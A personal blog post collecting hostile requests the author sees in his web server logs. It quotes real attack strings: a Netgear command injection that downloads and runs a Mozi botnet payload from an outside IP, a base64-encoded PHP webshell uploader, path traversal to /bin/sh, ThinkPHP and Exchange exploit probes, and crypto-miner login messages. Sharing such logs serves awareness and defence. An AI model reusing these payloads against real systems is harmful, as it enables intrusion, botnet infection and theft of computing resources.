Web probes for fun and profit

Started April 21, 2023 · Will Brokenbourgh

A collection of probes that I see on my web server logs. Oh the joys...

God loves geeks too!
Why Jesus?

2023-05-31b
GET /?cffaction=get_data_from_database&query=select%20md5(%22x2x23%22)
2023-05-31
GET /wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1BEOXdhSEFnWldOb2J5QW5QSEJ5WlQ0bkxuQm9jRjkxYm1GdFpTZ3BMaUpjYmlJdUp6eGljaTgrUEdadmNtMGdiV1YwYUc5a1BTSndiM04wSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaVgxOGlQanhwYm5CMWRDQnVZVzFsUFNKZklpQjBlWEJsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pWY0d4dllXUWlQand2Wm05eWJUNG5PMmxtS0NSZlVFOVRWQ2w3YVdZb1FHTnZjSGtvSkY5R1NVeEZVMXNuWDE4blhWc25kRzF3WDI1aGJXVW5YU3dnSkY5R1NVeEZVMXNuWDE4blhWc25ibUZ0WlNkZEtTbDdaV05vYnlBblQwc25PMzFsYkhObGUyVmphRzhnSjBWU0p6dDlmVDgrJzsKICAkZm4gPSAndXBsb2FkZXIucGhwJzsKICBpZiggZnVuY3Rpb25fZXhpc3RzKCdmaWxlX3B1dF9jb250ZW50cycpICkgewogICAgZmlsZV9wdXRfY29udGVudHMoJGZuLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogIH1lbHNlewogICAgQHRvdWNoKCRmbik7CiAgICBpZighJGZvID0gZm9wZW4oJGZuLCAnYScpKSB7CiAgICAgIGVjaG8gJ2Vycm9yJzsKICAgICAgZXhpdDsKICAgIH07CiAgICBmd3JpdGUoJGZvLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogICAgZmNsb3NlKCRmbyk7CiAgfQogIGlmKCBmaWxlX2V4aXN0cygkZm4pICkgewogICAgZWNobyAnYURyaXY0JzsKICAgIGV4aXQ7CiAgfQ==
2023-05-26
GET /Electron/download/windows/\\Program%20Files\\3CX%20Phone%20System\\Data\\DB\\base\\16384\\16393
2023-05-25
GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /lib/phpunit/Util/PHP/eval-stdin.php
GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php
GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /lib/phpunit/src/Util/PHP/eval-stdin.php
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /phpunit/Util/PHP/eval-stdin.php
GET /phpunit/phpunit/Util/PHP/eval-stdin.php
GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /phpunit/src/Util/PHP/eval-stdin.php
GET /vendor/phpunit/Util/PHP/eval-stdin.php
GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /vendor/phpunit/src/Util/PHP/eval-stdin.php
2023-05-24
\xff\xa2\xff
o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f
2023-05-23
GET /wp-content/plugins/wp-daft/t62.php
GET /wp-content/themes/hello-element/footer.php
GET /wp-content/plugins/wordpress-three/miin.php
GET /wp-admin/css/colors/coffee/index.php
silly coffee
GET /repeater.php
GET /wp-content/plugins/hellopress/wp_filemanager.php
GET /rindex.php?action=add
2023-05-22b
GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
GET /autodiscover/autodiscover.json?@zdi/Powershell
2023-05-22
GET /_ignition/execute-solution
2023-05-19
GET //wp-content/plugins/hellopress/wp_mna.php
GET //wp-content/plugins/hellopress/wp_filemanager.php
silly double slashes
2023-05-17b
GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp
2023-05-17
POST /service/extension/backup/mboximport?account-name=admin&append=1&no-switch=1&ow=2
2023-05-16c
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
2023-05-16b
GET /api/index.php/v1/config/application?public=true
2023-05-16
\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4]\x12\x98\xc4[\xe0\x13\xcf
2023-05-11
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
2023-05-09
GET /?'[?=print(9347655345-4954366)?]'
GET /?'{${print(9347655345-4954366)}}'
GET /?'+print(9347655345-4954366)+'
2023-05-05
{\"method\":\"login\",\"params\":{\"login\":\"45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV\",\"pass\":\"xxoo\",\"agent\":\"xmr-stak-cpu/1.3.0-1.5.0\"},\"id\":1}\n {\"id\":1,\"method\":\"mining.subscribe\",\"params\":[]}\n {\"params\": [\"miner1\", \"password\"], \"id\": 2, \"method\": \"mining.authorize\"}\n {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"blue1\",\"pass\":\"x\",\"agent\":\"Windows NT 6.1; Win64; x64\"}}\n {\"params\": [\"miner1\", \"bf\", \"00000001\", \"504e86ed\", \"b2957c02\"], \"id\": 4, \"method\": \"mining.submit\"}\n {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"x\",\"pass\":\"null\",\"agent\":\"XMRig/5.13.1\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"rx/0\",\"rx/wow\",\"rx/loki\",\"rx/arq\",\"rx/sfx\",\"rx/keva\"]}}\n
2023-05-04c
MGLNDD_209.151.156.201_80\n
2023-05-04b
GET /wp-admin/shell20211028.php
2023-05-04
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://39.74.93.0:52900/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
2023-05-03f
\x16\x03\x01
2023-05-03e
SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/
2023-05-03d
/debug/default/view?panel=config
2023-05-03c
GET /wp-content/plugins/woocommerce-payments/changelog.txt
2023-05-03b
GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
2023-05-03
GET /s/130323e2635313e2135313e2930323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
2023-05-01
GET /?rest_route=/wp/v2/users/
2023-04-29b
GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
2023-04-29
GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
2023-04-25b
GET /?a=fetch&content=[php]die(@md5(HelloThinkCMF))[/php]
2023-04-25a
GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
2023-04-25
GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
2023-04-22
GET /index.php?option=com_acym&ctrl=frontmails&task=setNewIconShare
2023-04-21
GET /?tag/index=&tag=%7Bpbohome/Indexot:if(1)((URL%5B-36%5D.URL%5B-35%5D.URL%5B-34%5D.URL%5B-33%5D.URL%5B-32%5D.URL%5B-31%5D.URL%5B-30%5D.URL%5B-29%5D.URL%5B-28%5D.URL%5B-27%5D.URL%5B-26%5D.URL%5B-25%5D.URL%5B-24%5D.URL%5B-23%5D.URL%5B-22%5D.URL%5B-21%5D.URL%5B-20%5D)((URL%5B-19%5D.URL%5B-18%5D.URL%5B-17%5D.URL%5B-16%5D.URL%5B-15%5D.URL%5B-14%5D.URL%5B-13%5D.URL%5B-12%5D.URL%5B-11%5D.URL%5B-10%5D.URL%5B-9%5D.URL%5B-8%5D.URL%5B-7%5D)((URL%5B-6%5D.URL%5B-5%5D.URL%5B-4%5D.URL%5B-3%5D)(URL%5B-2%5D)),(URL%5B-19%5D.URL%5B-18%5D.URL%5B-17%5D.URL%5B-16%5D.URL%5B-15%5D.URL%5B-14%5D.URL%5B-13%5D.URL%5B-12%5D.URL%5B-11%5D.URL%5B-10%5D.URL%5B-9%5D.URL%5B-8%5D.URL%5B-7%5D)((URL%5B-6%5D.URL%5B-5%5D.URL%5B-4%5D.URL%5B-3%5D)(URL%5B-1%5D))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&file_put_contentsbase64_decodepost12
(nearly every day)
GET /?XDEBUG_SESSION_START=phpstorm

God bless you, and thank you for reading! Emoji of face grinning big

 

Comments

(No comments yet)

 

Post A Comment

Your name:

Your e-mail address: (Will not be seen or used by anyone else but me)

To help cut down on spam, what do you get when you add two and four?:

Please type your message below: (Please limit message to less than 1,000 characters)

By submitting your comment, you consent to me posting it on my site
 

All submissions are moderated before being posted

My Story   |   Web Server Probes   |   Today God is First!   |   Autism
 
This page should pass HTML validation. Standards-compliance is important to me.